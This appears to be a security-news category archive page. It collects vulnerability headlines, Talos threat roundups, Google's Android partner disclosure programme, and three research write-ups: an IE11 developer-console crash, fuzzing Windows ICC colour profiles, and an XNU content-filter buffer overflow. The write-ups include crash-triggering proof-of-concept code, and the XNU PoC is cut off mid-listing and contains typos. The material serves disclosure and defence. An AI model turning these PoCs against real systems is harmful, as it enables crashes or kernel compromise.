Category Archives: Vulnerabilities

Halloween News Wrap: The Election, Hospital Deaths and Other Scary Cyberattack Stories

Threatpost breaks down the scariest stories of the week ended Oct. 30 haunting the security industry -- including bugs that just won't die.

Microsoft Warns Threat Actors Continue to Exploit Zerologon Bug

Tech giant and feds this week renewed their urge to organizations to update Active Directory domain controllers.

NVIDIA Patches Critical Bug in High-Performance Servers

NVIDIA said a high-severity information-disclosure bug impacting its DGX A100 server line wouldn't be patched until early 2021.

Tracking Users on Waze

A security researcher discovered a wulnerability in Waze that breaks the anonymity of users:

I found out that I can visit Waze from any web browser at waze.com/livemap so I decided to check how are those driver icons implemented. What I found is that I can ask Waze API for data on a location by sending my latitude and longitude coordinates. Except the essential traffic information, Waze also sends me coordinates of other drivers who are nearby. What caught my eyes was that identification numbers (ID) associated with the icons were not changing over time. I decided to track one driver and after some time she really appeared in a different place on the same road.

The vulnerability has been fixed. More interesting is that the researcher was able to de-anonymize some of the Waze users, proving yet again that anonymity is hard when we’re all so different.

Election Security: How Mobile Devices Are Shaping the Way We Work, Play and Vote

With the election just a week away, cybercriminals are ramping up mobile attacks on citizens under the guise of campaign communications.

Experts Weigh in on E-Commerce Security Amid Snowballing Threats

How a retail sector reeling from COVID-19 can lock down their online systems to prevent fraud during the upcoming holiday shopping spike.

Researchers: LinkedIn, Instagram Vulnerable to Preview-Link RCE Security Woes

Popular chat apps, including LINE, Slack, Twitter DMs and others, can also leak location data and share private info with third-party servers.

Threat Roundup for October 16 to October 23

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between October 16 and October 23. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference

20201023-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for October 16 to October 23 appeared first on Cisco Blogs.

IoT Device Takeovers Surge 100 Percent in 2020

The COVID-19 pandemic, coupled with an explosion in the number of connected devices, have led to a swelling in IoT infections observed on wireless networks.

Nvidia Warns Gamers of Severe GeForce Experience Flaws

Versions of Nvidia GeForce Experience for Windows prior to 3.20.5.70 are affected by a high-severity bug that could enable code execution, denial of service and more.

Facebook, News and XSS Underpin Complex Browser Locker Attack

A sophisticated “browser locker” campaign is spreading via Facebook, ultimately pushing a tech-support scam. The effort is more advanced than most, because it involves exploiting a cross-site scripting (XSS) vulnerability on a popular news site, researchers said. Browser lockers are a type of redirection attack where web surfers will click on a site, only to […]

Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks

The Feds have published a Top 25 exploits list, rife with big names like BlueKeep, Zerologon and other notorious security vulnerabilities.

Cisco Warns of Severe DoS Flaws in Network Security Software

The majority of the bugs in Cisco’s Firepower Threat Defense (FTD) and Adaptive Security Appliance (ASA) software can enable denial of service (DoS) on affected devices.

Oracle Kills 402 Bugs in Massive October Patch Update

Over half of Oracle's flaws in its quarterly patch update can be remotely exploitable without authentication; 65 are critical, and two have CVSS scores of 10 out of 10.

NSA Advisory on Chinese Government Hacking

The NSA released an advisory listing the top twenty-five known vulnerabilities currently being exploited by Chinese nation-state attackers.

This advisory provides Common Vulnerabilities and Exposures (CVEs) known to be recently leveraged, or scanned-for, by Chinese state-sponsored cyber actors to enable successful hacking operations against a multitude of victim networks. Most of the vulnerabilities listed below can be exploited to gain initial access to victim networks using products that are directly accessible from the Internet and act as gateways to internal networks. The majority of the products are either for remote access (T1133) or for external web services (T1190), and should be prioritized for immediate patching.

Facebook: A Top Launching Pad For Phishing Attacks

Amazon, Apple, Netflix, Facebook and WhatsApp are top brands leveraged by cybercriminals in phishing and fraud attacks - including a recent strike on a half-million Facebook users.

Microsoft Exchange, Outlook Under Siege By APTs

A new threat report shows that APTs are switching up their tactics when exploiting Microsoft services like Exchange and OWA, in order to avoid detection.

Threat Roundup for October 9 to October 16

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between October 9 and October 16. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference

20201016-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for October 9 to October 16 appeared first on Cisco Blogs.

Biden Campaign Staffers Targeted in Cyberattack Leveraging Antivirus Lure, Dropbox Ploy

Google's Threat Analysis Group sheds more light on targeted credential phishing and malware attacks on the staff of Joe Biden's presidential campaign.

FIFA 21 Blockbuster Release Gives Fraudsters an Open Field for Theft

In-game features of the just-released FIFA 21 title give scammers easy access its vast audience.

Crash Reproduction Series: IE Developer Console UAF

Crash Reproduction Series: IE Developer Console UAF

During a DFIR investigation, using ZecOps Crash Forensics on a developer’s computer we encountered a consistent crash on Internet Explorer 11. The TL;DR is that albeit this bug is not exploitable, it presents an interesting expansion to the attack surface through the Developer Consoles on browsers.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

While examining the stack trace, we noticed a JavaScript engine failure. The type of the exception was a null pointer dereference, which is typically not alarming. We investigated further to understand whether this event can be exploited.

We examined the stack trace below: 

58c0cdba     mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2+0xb
584d6ebc     mshtml!CDomEventRegistrationCallback2<CDiagnosticsElementEventHelper>::OnDOMEventListenerRemoved2+0x1a
584d8a1c     mshtml!DOMEventDebug::InvokeUnregisterCallbacks+0x100
58489f85     mshtml!CListenerAry::ReleaseAndDelete+0x42
582f6d3a     mshtml!CBase::RemoveEventListenerInternal+0x75
5848a9f7     mshtml!COmWindowProxy::RemoveEventListenerInternal+0x1a
582fb8b9     mshtml!CBase::removeEventListener+0x57
587bf1a5     mshtml!COmWindowProxy::removeEventListener+0x29
57584dae     mshtml!CFastDOM::CWindow::Trampoline_removeEventListener+0xb5
57583bb3     jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x1de
574d4492     jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
[...more jscript9 functions]
581b0838     jscript9!ScriptEngineBase::Execute+0x9d
580b3207     mshtml!CJScript9Holder::ExecuteCallback+0x48
580b2fd3     mshtml!CListenerDispatch::InvokeVar+0x227
57fe5ad1     mshtml!CListenerDispatch::Invoke+0x6d
58194d17     mshtml!CEventMgr::_InvokeListeners+0x1ea
58055473     mshtml!CEventMgr::_DispatchBubblePhase+0x32
584d48aa     mshtml!CEventMgr::Dispatch+0x41e
584d387d     mshtml!CEventMgr::DispatchPointerEvent+0x1b0
5835f332     mshtml!CEventMgr::DispatchClickEvent+0x2c3
5835ce15     mshtml!CElement::Fire_onclick+0x37
583baa8e     mshtml!CElement::DoClick+0xd5
[...]

and noticed that the flow that led to the crash was:

  • An onclick handler fired due to a user input
  • The onclick handler was executed
  • removeEventListener was called

The crash happened at:

mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2+0xb:

58c0cdcd 8b9004010000    mov     edx,dword ptr [eax+104h] ds:002b:00000104=????????

Relevant commands leading to a crash:

58c0cdc7 8b411c       mov     eax, dword ptr [ecx+1Ch]
58c0cdca 8b401c       mov     eax, dword ptr [eax+1Ch]
58c0cdcd 8b9004010000 mov     edx, dword ptr [eax+104h]

Initially ecx is the “this” pointer of the called member function’s class. On the first dereference we get a zeroed region, on the second dereference we get NULL, and on the third one we crash.

Reproduction

We tried to reproduce a legit call to mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2 to see how it looks in a non-crashing scenario. We came to the conclusion that the event is called only when the IE Developer Tools window is open with the Events tab.

We found out that when the dev tools Events tab is opened, it subscribes to events for added and removed event listeners. When the dev tools window is closed, the event consumer is freed without unsubscribing, causing a use-after-free bug which results in a null dereference crash.

Summary

Tools such as Developer Options dynamically add additional complexity to the process and may open up additional attack surfaces.

Exploitation

Even though Use-After-Free (UAF) bugs can often be exploited for arbitrary code execution, this bug is not exploitable due to MemGC mitigation. The freed memory block is zeroed, but not deallocated while other valid objects still point to it. As a result, the referenced pointer is always a NULL pointer, leading to a non-exploitable crash.

Responsible Disclosure

We reported this issue to Microsoft, that decided to not fix this UAF issue.

POC

Below is a small HTML page that demonstrates the concept and leads to a crash.
Tested IE11 version: 11.592.18362.0
Update Versions: 11.0.170 (KB4534251)

<!DOCTYPE html>
<html>
<body>
<pre>
1. Open dev tools
2. Go to Events tab
3. Close dev tools
4. Click on Enable
</pre>
<button onclick="setHandler()">Enable</button>
<button onclick="removeHandler()">Disable</button>
<p id="demo"></p>
<script>
function myFunction() {
    document.getElementById("demo").innerHTML = Math.random();
}
function setHandler() {
    document.body.addEventListener("mousemove", myFunction);
}
function removeHandler() {
    document.body.removeEventListener("mousemove", myFunction);
}
</script>
</body>
</html>

Interested in researching browser & OS bugs daily?

ZecOps is expanding. We’re looking for additional researchers to join ZecOps Research Team. If you’re interested, send us a note at careers@zecops.com

Hacking Apple for Profit

Five researchers hacked Apple Computer’s networks — not their products — and found fifty-five vulnerabilities. So far, they have received $289K.

One of the worst of all the bugs they found would have allowed criminals to create a worm that would automatically steal all the photos, videos, and documents from someone’s iCloud account and then do the same to the victim’s contacts.

Lots of details in this blog post by one of the hackers.

Threat Roundup for October 2 to October 9

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between September 25 and October 2. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference

20201009-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for October 2 to October 9 appeared first on Cisco Blogs.

Announcing the launch of the Android Partner Vulnerability Initiative

Posted by Kylie McRoberts, Program Manager and Alec Guertin, Security Engineer

Android graphic

Google’s Android Security & Privacy team has launched the Android Partner Vulnerability Initiative (APVI) to manage security issues specific to Android OEMs. The APVI is designed to drive remediation and provide transparency to users about issues we have discovered at Google that affect device models shipped by Android partners.

Another layer of security

Android incorporates industry-leading security features and every day we work with developers and device implementers to keep the Android platform and ecosystem safe. As part of that effort, we have a range of existing programs to enable security researchers to report security issues they have found. For example, you can report vulnerabilities in Android code via the Android Security Rewards Program (ASR), and vulnerabilities in popular third-party Android apps through the Google Play Security Rewards Program. Google releases ASR reports in Android Open Source Project (AOSP) based code through the Android Security Bulletins (ASB). These reports are issues that could impact all Android based devices. All Android partners must adopt ASB changes in order to declare the current month’s Android security patch level (SPL). But until recently, we didn’t have a clear way to process Google-discovered security issues outside of AOSP code that are unique to a much smaller set of specific Android OEMs. The APVI aims to close this gap, adding another layer of security for this targeted set of Android OEMs.

Improving Android OEM device security

The APVI covers Google-discovered issues that could potentially affect the security posture of an Android device or its user and is aligned to ISO/IEC 29147:2018 Information technology -- Security techniques -- Vulnerability disclosure recommendations. The initiative covers a wide range of issues impacting device code that is not serviced or maintained by Google (these are handled by the Android Security Bulletins).

Protecting Android users

The APVI has already processed a number of security issues, improving user protection against permissions bypasses, execution of code in the kernel, credential leaks and generation of unencrypted backups. Below are a few examples of what we’ve found, the impact and OEM remediation efforts.

Permission Bypass

In some versions of a third-party pre-installed over-the-air (OTA) update solution, a custom system service in the Android framework exposed privileged APIs directly to the OTA app. The service ran as the system user and did not require any permissions to access, instead checking for knowledge of a hardcoded password. The operations available varied across versions, but always allowed access to sensitive APIs, such as silently installing/uninstalling APKs, enabling/disabling apps and granting app permissions. This service appeared in the code base for many device builds across many OEMs, however it wasn’t always registered or exposed to apps. We’ve worked with impacted OEMs to make them aware of this security issue and provided guidance on how to remove or disable the affected code.

Credential Leak

A popular web browser pre-installed on many devices included a built-in password manager for sites visited by the user. The interface for this feature was exposed to WebView through JavaScript loaded in the context of each web page. A malicious site could have accessed the full contents of the user’s credential store. The credentials are encrypted at rest, but used a weak algorithm (DES) and a known, hardcoded key. This issue was reported to the developer and updates for the app were issued to users.

Overly-Privileged Apps

The checkUidPermission method in the PackageManagerService class was modified in the framework code for some devices to allow special permissions access to some apps. In one version, the method granted apps with the shared user ID com.google.uid.shared any permission they requested and apps signed with the same key as the com.google.android.gsf package any permission in their manifest. Another version of the modification allowed apps matching a list of package names and signatures to pass runtime permission checks even if the permission was not in their manifest. These issues have been fixed by the OEMs.

More information

Keep an eye out at https://bugs.chromium.org/p/apvi/ for future disclosures of Google-discovered security issues under this program, or find more information there on issues that have already been disclosed.

Acknowledgements: Scott Roberts, Shailesh Saini and Łukasz Siewierski, Android Security and Privacy Team

Fuzzing Image Parsing in Windows, Part One: Color Profiles

Image parsing and rendering are basic features of any modern operating system (OS). Image parsing is an easily accessible attack surface, and a vulnerability that may lead to remote code execution or information disclosure in such a feature is valuable to attackers. In this multi-part blog series, I am reviewing Windows OS’ built-in image parsers and related file formats: specifically looking at creating a harness, hunting for corpus and fuzzing to find vulnerabilities. In part one of this series I am looking at color profiles—not an image format itself, but something which is regularly embedded within images. 

What is an ICC Color Profile?

Wikipedia provides a more-than-adequate description of ICC color profiles: "In color management, an ICC profile is a set of data that characterizes a color input or output device, or a color space, according to standards promulgated by the International Color Consortium (ICC). Profiles describe the color attributes of a particular device or viewing requirement by defining a mapping between the device source or target color space and a profile connection space (PCS). This PCS is either CIELAB (L*a*b*) or CIEXYZ. Mappings may be specified using tables, to which interpolation is applied, or through a series of parameters for transformations.

In simpler terms, an ICC color profile is a binary file that gets embedded into images and parsed whenever ICC supported software processes the images. 

Specification

The ICC specification is around 100 pages and should be easy to skim through. Reading through specifications gives a better understanding of the file format, different types of color profiles, and math behind the color transformation. Furthermore, understanding of its file format internals provides us with information that can be used to optimize fuzzing, select a good corpus, and prepare fuzzing dictionaries.

History of Color Management in Windows

Windows started to ship Image Color Management (ICM) version 1.0 on Windows 95, and version 2.0 beginning with Windows 98 onwards. A major overhaul to Windows Color System (WCS) 1.0 happened in Windows Vista onwards. While ICC color profiles are binary files, WCS color profiles use XML as its file format. In this blog post, I am going to concentrate on ICC color profiles.

Microsoft has a list of supported Windows APIs. Looking into some of the obviously named APIs, such as OpenColorProfile, we can see that it is implemented in MSCMS.dll. This DLL is a generic entry point and supports loading of Microsoft’s Color Management Module (CMM) and third-party CMMs such as Adobe’s CMM. Microsoft’s CMM—the ICM—can be found as ICM32.dll in system32 directory. 


Figure 1: ICM32

Windows’ CMM was written by a third-party during the Windows 95 era and still ships more or less with the same code (with security fixes over the decades). Seeing such an old module gives me some hope of finding a new vulnerability. But this is also a small module that may have gone through multiple rounds of review and fuzzing: both by internal product security teams and by external researchers, reducing my hopes to a certain degree. Looking for any recent vulnerabilities in ICM32, we can see multiple bugs from 2017-2018 by Project Zero and ZDI researchers, but then relative silence from 2019 onwards.

Making a Harness

Although there is a list of ICM APIs in MSDN, we need to find an API sequence used by Windows for any ICC related operations. One of the ways to find our API sequence is to search a disassembly of Windows DLLs and EXEs in hope to find the color profile APIs being used. Another approach is to find a harness for open source Color Management Systems such as Little CMS (LCMS). Both of these end up pointing to very small set of APIs with functionality to open color profiles and create color transformations.

Given this information, a simple initial harness was written: 

#include <stdio.h>
#include <Windows.h>
#include <Icm.h>

#pragma comment(lib, "mscms.lib")

int main(int argc, char** argv)
{
    char dstProfilePath[] = "sRGB Color Space Profile.icm";
    tagPROFILE destinationProfile;
    HPROFILE   hDstProfile = nullptr;   

    destinationProfile.dwType = PROFILE_FILENAME;
    destinationProfile.pProfileData = dstProfilePath;
    destinationProfile.cbDataSize = (strlen(dstProfilePath) + 1);

    hDstProfile = OpenColorProfileA(&destinationProfile, PROFILE_READ,
        FILE_SHARE_READ, OPEN_EXISTING);
    if (nullptr == hDstProfile)
    {
        return -1;
    }   

    tagPROFILE sourceProfile;
    HPROFILE   hSrcProfile = nullptr;
    HTRANSFORM hColorTransform = nullptr;     

    DWORD dwIntent[] = { INTENT_PERCEPTUAL, INTENT_PERCEPTUAL };
    HPROFILE hProfileList[2];   

    sourceProfile.dwType = PROFILE_FILENAME;
    sourceProfile.pProfileData = argv[1];
    sourceProfile.cbDataSize = (strlen(argv[1]) + 1);

    hSrcProfile = OpenColorProfileA(&sourceProfile, PROFILE_READ,
        FILE_SHARE_READ, OPEN_EXISTING);
    if (nullptr == hSrcProfile)
    {
        return -1;
    }   

    hProfileList[0] = hSrcProfile;
    hProfileList[1] = hDstProfile;

    hColorTransform = CreateMultiProfileTransform(
        hProfileList,
        2,
        dwIntent,
        2,
        USE_RELATIVE_COLORIMETRIC | BEST_MODE,
        INDEX_DONT_CARE
    );

    if (nullptr == hColorTransform)
    {
        return -1;
    }   

    DeleteColorTransform(hColorTransform);
    CloseColorProfile(hSrcProfile);
    CloseColorProfile(hDstProfile);
    return 0;
}

Listing 1: Harness

Hunting for Corpus and Dictionary

Sites offering multiple color profiles can be found all over the internet. One of the other main source of color profile is images; many image files contain a color profile but require some programming/tools to dump their color profile to stand-alone files.

Simply skimming through the specification, we can also make sure the corpus contains at least one sample from all of the seven different color profiles. This along with the code coverage information can be used to prepare the first set of corpuses for fuzzing.

A dictionary, which helps the fuzzer to find additional code paths, can be prepared by combing through specifications and creating a list of unique tag names and values. One can also find dictionaries from open source fuzzing attempts on LCMS, etc.

Fuzzing

I used a 16-core machine to fuzz the harness with my first set of corpuses. Code coverage information from MSCMS.dll and ICM32.dll was used as feedback for my fuzzer. Crashes started to appear within a couple of days.

CVE-2020-1117 — Heap Overflow in InitNamedColorProfileData

The following crash happens in icm32!SwapShortOffset while trying to read out of bounds:

0:000> r
rax=0000023690497000 rbx=0000000000000000 rcx=00000000000000ff
rdx=000000000000ffff rsi=0000023690496f00 rdi=0000023690496fee
rip=00007ffa46bf3790 rsp=000000c2a56ff5a8 rbp=0000000000000001
 r8=0000000000000014  r9=0000023690497002 r10=0000000000000014
r11=0000000000000014 r12=000000c2a56ff688 r13=0000023690492de0
r14=000000000000000a r15=000000004c616220
iopl=0         nv up ei ng nz ac pe cy
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000293
icm32!SwapShortOffset+0x10:
00007ffa`46bf3790 0fb610          movzx   edx,byte ptr [rax] ds:00000236`90497000=??

0:000> !heap -p -a @rax
    address 0000023690497000 found in
    _DPH_HEAP_ROOT @ 23690411000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                             23690412b60:      23690496f00              100 -      23690496000             2000
    00007ffa51644807 ntdll!RtlDebugAllocateHeap+0x000000000000003f
    00007ffa515f49d6 ntdll!RtlpAllocateHeap+0x0000000000077ae6
    00007ffa5157babb ntdll!RtlpAllocateHeapInternal+0x00000000000001cb
    00007ffa51479da0 msvcrt!malloc+0x0000000000000070
    00007ffa46bf3805 icm32!SmartNewPtr+0x0000000000000011
    00007ffa46bf37c8 icm32!SmartNewPtrClear+0x0000000000000014
    00007ffa46c02d05 icm32!InitNamedColorProfileData+0x0000000000000085
    00007ffa46bf6e39 icm32!Create_LH_ProfileSet+0x0000000000004e15
    00007ffa46bf1973 icm32!PrepareCombiLUTs+0x0000000000000117
    00007ffa46bf1814 icm32!CMMConcatInitPrivate+0x00000000000001f4
    00007ffa46bf12a1 icm32!CWConcatColorWorld4MS+0x0000000000000075
    00007ffa46bf11f4 icm32!CMCreateMultiProfileTransformInternal+0x00000000000000e8
    00007ffa46bf1039 icm32!CMCreateMultiProfileTransform+0x0000000000000029
    00007ffa48f16e6c mscms!CreateMultiProfileTransform+0x000000000000024c
    00007ff774651191 ldr+0x0000000000001191
    00007ff7746514b4 ldr+0x00000000000014b4
    00007ffa505a7bd4 KERNEL32!BaseThreadInitThunk+0x0000000000000014
    00007ffa515aced1 ntdll!RtlUserThreadStart+0x0000000000000021

Listing 2: Crash info

icm32!SwapShortOffset reads unsigned short values, bswaps them and stores at the same location, giving this crash both read and write primitives.

unsigned __int16 *__fastcall SwapShortOffset(void *sourceBuff, unsigned int offset, unsigned int len)
{
  unsigned __int16 *endBuff; // r9
  unsigned __int16 *result; // rax

  endBuff = (sourceBuff + len);
  for ( result = (sourceBuff + offset); result < endBuff; ++result )
    *result = _byteswap_ushort(*result);        // read, bswap and write
  return result;
}

Listing 3: SwapShortOffset decompiled

The crashing function icm32!SwapShortOffset doesn’t immediately point to the root cause of the bug. For that, we need to go one call up to icm32!InitNamedColorProfileData.

__int64 __fastcall InitNamedColorProfileData(__int64 a1, void *hProfile, int a3, _DWORD *a4)
{
  ...
  ...
  errCode = CMGetPartialProfileElement(hProfile, 'ncl2', 0, pBuffSize, 0i64);      // getting size of ncl2 element
  if ( errCode )
    return errCode;
  minSize = pBuffSize[0];
  if ( pBuffSize[0] < 0x55 )
    minSize = 0x55;
  pBuffSize[0] = minSize;
  outBuff = SmartNewPtrClear(minSize, &errCode);                                    // allocating the buffer for ncl2
  ...
  ...
  errCode = CMGetPartialProfileElement(hProfile, 'ncl2', 0, pBuffSize, outBuff);    // reading ncl2 elements to buffer
  if ( !errCode )
  {
    ...
    ...
    totalSizeToRead = count * totalDeviceCoord;
    if ( totalSizeToRead < 0xFFFFFFFFFFFFFFAEui64 && totalSizeToRead + 0x51 <= pBuffSize[0] )  // totalSizeToRead + 0x51 <= element size?
    {
      currPtr = outBuff + 0x54;            // wrong offset of 0x54 is used
      ...
      ...
      do
      {   
        SwapShortOffset((currPtr + 0x20), 0, 6u);
        ...
        --count;
      }while(count)

Listing 4: InitNamedColorProfileData decompiled

Here the code tries to read the ‘ncl2’ tag/element and get the size of the stream from file. A buffer is allocated and the same call is made once again to read the complete content of the element ‘ncl2’. This buffer is parsed to find the count and number of device coordinates, and the values are verified by making sure read/write ends up with in the buffer size. The vulnerability here is that the offset (0x51) used for verification is smaller than the offset (0x54) used to advance the buffer pointer. This error provides a 3 byte out of bound read and write.

The fix for this was pretty straight forward—change the verification offset to 0x54, which is how Microsoft fixed this bug.

Additional Vulnerabilities

While looking at the previous vulnerability, one can see a pattern of using the CMGetPartialProfileElement function for reading the size, allocation, and reading content. This sort of pattern can introduce bugs such as unconstrained size or integer overflow while adding an offset to the size, etc. I decided to pursue this function and see if such instances are present within ICM32.dll.

I found three instances which had an unchecked offset access: CMConvIndexToNameProfile, CMConvNameToIndexProfile and CMGetNamedProfileInfoProfile. All of these functions are accessible through exported and documented MSCMS functions: ConvertIndexToColorName, CMConvertColorNameToIndex, and GetNamedProfileInfo respectively.

__int64 __fastcall CMConvIndexToNameProfile(HPROFILE hProfile, __int64 a2, __int64 a3, unsigned int a4)
{
  ...
  ...
  errCode = CMGetPartialProfileElement(hProfile, 'ncl2', 0, pBuffSize, 0i64);    // read size
  if ( !errCode )
  {
    allocBuff = SmartNewPtr(pBuffSize[0], &errCode);
    if ( !errCode )
    {
      errCode = CMGetPartialProfileElement(hProfile, 'ncl2', 0, pBuffSize, allocBuff);    // read to buffer
      if ( !errCode )
      {
        SwapLongOffset((allocBuff + 12), 0, 4u);         // 12 > *pBuffSize ?
        SwapLongOffset((allocBuff + 16), v12, v13);

Listing 5: CMConvIndexToNameProfile decompiled

The bug discovered in CMConvIndexToNameProfile and the other two functions is that there is no minimum length check for ‘ncl2’ elements and offsets 12 and 16 are directly accessed for both read and write—providing out of bound read/write to allocBuffer, if the size of allocBuffer is smaller than 12.

Microsoft decided not to immediately fix these three vulnerabilities due to the fact that none of the Windows binaries use these functions. Independently, we did not find any Windows or third-party software using these APIs.

Conclusion

In part one of this blog series, we looked into color profiles, wrote a harness, hunted for corpus and successfully found multiple vulnerabilities. Stay tuned for part two, where we will be looking at a relatively less talked about vulnerability class: uninitialized memory.

From a comment to a CVE: Content filter strikes again!

From a comment to a CVE: Content filter strikes again!

0x0- Opening

In the past few years XNU had few vulns in a newly added/changed code areas (extra_recipe, kq double release) and in the content filter area (bug collision uaf, silent patched uaf) so it is no surprise that the combination of the newly added code and complex areas (content-filter) alongside with a funny comment caught our attention.

0x1- Discovery story

Upon a closer look at the newly added xnu source of Darwin 19 you might notice a strange comment in content_filter.c:

/*
 *	TO DO LIST
 *
 *	SOONER:
 *
 *	Deal with OOB
 *
 *	LATER:
 *
 *	If support datagram, enqueue control and address mbufs as well
 */

Is this comment referring to OOB read/write issues? Probably not but it won’t hurt to run a quick search for those so we will use the magic tool CMD +f to search for memcpy calls and in less than two minutes you will find the following 

0x2- The bug.

The newly updated cfil_sock_attach function which is easily reached from tcp_usr_connect and tcp_usr_connectx with controlled variables:

errno_t
cfil_sock_attach(struct socket *so, struct sockaddr *local, struct sockaddr *remote, int dir) // (Part A)
{
	errno_t error = 0;
	uint32_t filter_control_unit;

	socket_lock_assert_owned(so);

	/* Limit ourselves to TCP that are not MPTCP subflows */
	if ((so->so_proto->pr_domain->dom_family != PF_INET &&
	    so->so_proto->pr_domain->dom_family != PF_INET6) ||
	    so->so_proto->pr_type != SOCK_STREAM ||
	    so->so_proto->pr_protocol != IPPROTO_TCP ||
	    (so->so_flags & SOF_MP_SUBFLOW) != 0 ||
	    (so->so_flags1 & SOF1_CONTENT_FILTER_SKIP) != 0) {
		goto done;
	}

	filter_control_unit = necp_socket_get_content_filter_control_unit(so);
	if (filter_control_unit == 0) {
		goto done;
	}

	if (filter_control_unit == NECP_FILTER_UNIT_NO_FILTER) {
		goto done;
	}
	if ((filter_control_unit & NECP_MASK_USERSPACE_ONLY) != 0) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_userspace_only);
		goto done;
	}
	if (cfil_active_count == 0) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_in_vain);
		goto done;
	}
	if (so->so_cfil != NULL) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_already);
		CFIL_LOG(LOG_ERR, "already attached");
	} else {
		cfil_info_alloc(so, NULL);
		if (so->so_cfil == NULL) {
			error = ENOMEM;
			OSIncrementAtomic(&cfil_stats.cfs_sock_attach_no_mem);
			goto done;
		}
		so->so_cfil->cfi_dir = dir;
	}
	if (cfil_info_attach_unit(so, filter_control_unit, so->so_cfil) == 0) {
		CFIL_LOG(LOG_ERR, "cfil_info_attach_unit(%u) failed",
		    filter_control_unit);
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_failed);
		goto done;
	}
	CFIL_LOG(LOG_INFO, "so %llx filter_control_unit %u sockID %llx",
	    (uint64_t)VM_KERNEL_ADDRPERM(so),
	    filter_control_unit, so->so_cfil->cfi_sock_id);

	so->so_flags |= SOF_CONTENT_FILTER;
	OSIncrementAtomic(&cfil_stats.cfs_sock_attached);

	/* Hold a reference on the socket */
	so->so_usecount++;

	/*
	 * Save passed addresses for attach event msg (in case resend
	 * is needed.
	 */
	if (remote != NULL) {
		memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len); // Part B
	}
	if (local != NULL) {
		memcpy(&so->so_cfil->cfi_so_attach_laddr, local, local->sa_len); // Part C
	}

	error = cfil_dispatch_attach_event(so, so->so_cfil, 0, dir);
	/* We can recover from flow control or out of memory errors */
	if (error == ENOBUFS || error == ENOMEM) {
		error = 0;
	} else if (error != 0) {
		goto done;
	}

	CFIL_INFO_VERIFY(so->so_cfil);
done:
	return error;
}

We can see that in (Part A) the function receives two sockaddrs parameters (local and remote) which are user controlled and then using their sa_len struct member (remote in (Part B) and local in (Part C)) in order to copy data to cfi_so_attach_laddr and cfi_so_attach_faddr. Parts (A) (B) and (C) were all result of a new changes in XNU.

So what’s the problem? The problem is there is lack of check of sa_len which can be set up to 255 and then will be used in a memcpy to copy data into a union sockaddr_in_4_6 which is a 28 bytes struct – resulting in a buffer overflow.

The PoC below which is almost identical to Ian Beer’s mptcp with two changes. This POC requires a pre-requisite to reach the vulnerable area. In order to trigger the vulnerability we need to use an MDM enrolled device with NECP policy, or attach the socket to a valid filter_control_unit. One way to do it is to create one with cfilutil and then manually write it to kernel memory using a kernel debugger.

After running the POC, it will crash the kernel:

#include <sys/socket.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <unistd.h>

int main(int argc, const char * argv[ ]) {

	int sock = socket(AF_INET, SOCK_STRAEM, IPPROTO,TCP);
	If (sock < 0) {
		printf(“socket failed\n”);
		return -1;
	}
	printf(“got socket: %d\n”, sock);
	struct sockaddr* sockaddr_dst = malloc(256);
	memset(sockaddr_dst, ‘A’, 256);
	sockaddr_dst->sa_len = 255;
	sockaddr_dst->sa_faimly =AF_INET;
	sa_endpoint_t eps = {0};
